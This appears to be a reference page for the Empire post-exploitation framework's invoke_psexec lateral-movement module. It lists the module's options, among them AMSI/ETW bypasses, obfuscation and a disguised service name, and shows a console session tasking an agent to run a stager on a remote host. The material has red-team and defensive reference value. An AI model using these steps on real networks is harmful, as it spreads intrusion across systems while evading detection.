Invoke-PsExec - Empire Module


This page contains detailed information about how to use the powershell/lateral_movement/invoke_psexec Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-PsExec
Module: powershell/lateral_movement/invoke_psexec
Source code [1]: empire/server/modules/powershell/lateral_movement/invoke_psexec.yaml
Source code [2]: empire/server/modules/powershell/lateral_movement/invoke_psexec.py
MITRE ATT&CK: T1035, T1077, S0029
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The invoke_psexec module executes a stager on remote hosts using PsExec type functionality.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the invoke_psexec module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the invoke_psexec module:

Agent
Agent to run module on.

ComputerName
Host to execute the stager on.

ServiceName
The name of the service to create.
Default value: Updater.

Additional Module Options


This is a list of additional options that are supported by the invoke_psexec module:

Bypasses
Bypasses as a space separated list to be prepended to the launcher.
Default value: mattifestation etw.

Command
Custom command to execute on remote hosts.

Listener
Listener to use.

Obfuscate
Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
Default value: False.

ObfuscateCommand
The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
Default value: Token\All\1.

OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

ResultFile
Name of the file to write the results to on agent machine.

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Invoke_psexec Example Usage


Here's an example of how to use the invoke_psexec module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/lateral_movement/invoke_psexec

 Author       @harmj0y                                                           
 Background   True                                                               
 Comments     https://github.com/rapid7/metasploit-                              
              framework/blob/master/tools/psexec.rb                              
 Description  Executes a stager on remote hosts using PsExec type functionality. 
 Language     powershell                                                         
 Name         powershell/lateral_movement/invoke_psexec                          
 NeedsAdmin   False                                                              
 OpsecSafe    False                                                              
 Software     http://attack.mitre.org/software/S0029                             
 Techniques   http://attack.mitre.org/techniques/T1035                           
              http://attack.mitre.org/techniques/T1077                           


,Record Options----,--------------------,----------,-------------------------------------,
| Name             | Value              | Required | Description                         |
|------------------|--------------------|----------|-------------------------------------|
| Agent            |                    | True     | Agent to run module on.             |
|------------------|--------------------|----------|-------------------------------------|
| Bypasses         | mattifestation etw | False    | Bypasses as a space separated list  |
|                  |                    |          | to be prepended to the launcher.    |
|------------------|--------------------|----------|-------------------------------------|
| Command          |                    | False    | Custom command to execute on remote |
|                  |                    |          | hosts.                              |
|------------------|--------------------|----------|-------------------------------------|
| ComputerName     |                    | True     | Host to execute the stager on.      |
|------------------|--------------------|----------|-------------------------------------|
| Listener         |                    | False    | Listener to use.                    |
|------------------|--------------------|----------|-------------------------------------|
| Obfuscate        | False              | False    | Switch. Obfuscate the launcher      |
|                  |                    |          | powershell code, uses the           |
|                  |                    |          | ObfuscateCommand for obfuscation    |
|                  |                    |          | types. For powershell only.         |
|------------------|--------------------|----------|-------------------------------------|
| ObfuscateCommand | Token\All\1        | False    | The Invoke-Obfuscation command to   |
|                  |                    |          | use. Only used if Obfuscate switch  |
|                  |                    |          | is True. For powershell only.       |
|------------------|--------------------|----------|-------------------------------------|
| OutputFunction   | Out-String         | False    | PowerShell's output function to use |
|                  |                    |          | ("Out-String", "ConvertTo-Json",    |
|                  |                    |          | "ConvertTo-Csv", "ConvertTo-Html",  |
|                  |                    |          | "ConvertTo-Xml").                   |
|------------------|--------------------|----------|-------------------------------------|
| Proxy            | default            | False    | Proxy to use for request (default,  |
|                  |                    |          | none, or other).                    |
|------------------|--------------------|----------|-------------------------------------|
| ProxyCreds       | default            | False    | Proxy credentials                   |
|                  |                    |          | ([domain\]username:password) to use |
|                  |                    |          | for request (default, none, or      |
|                  |                    |          | other).                             |
|------------------|--------------------|----------|-------------------------------------|
| ResultFile       |                    | False    | Name of the file to write the       |
|                  |                    |          | results to on agent machine.        |
|------------------|--------------------|----------|-------------------------------------|
| ServiceName      | Updater            | True     | The name of the service to create.  |
|------------------|--------------------|----------|-------------------------------------|
| UserAgent        | default            | False    | User-agent string to use for the    |
|                  |                    |          | staging request (default, none, or  |
|                  |                    |          | other).                             |
'------------------'--------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/lateral_movement/invoke_psexec) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/lateral_movement/invoke_psexec) > set ComputerName dbserver-01
[*] Set ComputerName to dbserver-01
(Empire: usemodule/powershell/lateral_movement/invoke_psexec) > set ServiceName Updater
[*] Set ServiceName to Updater
(Empire: usemodule/powershell/lateral_movement/invoke_psexec) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.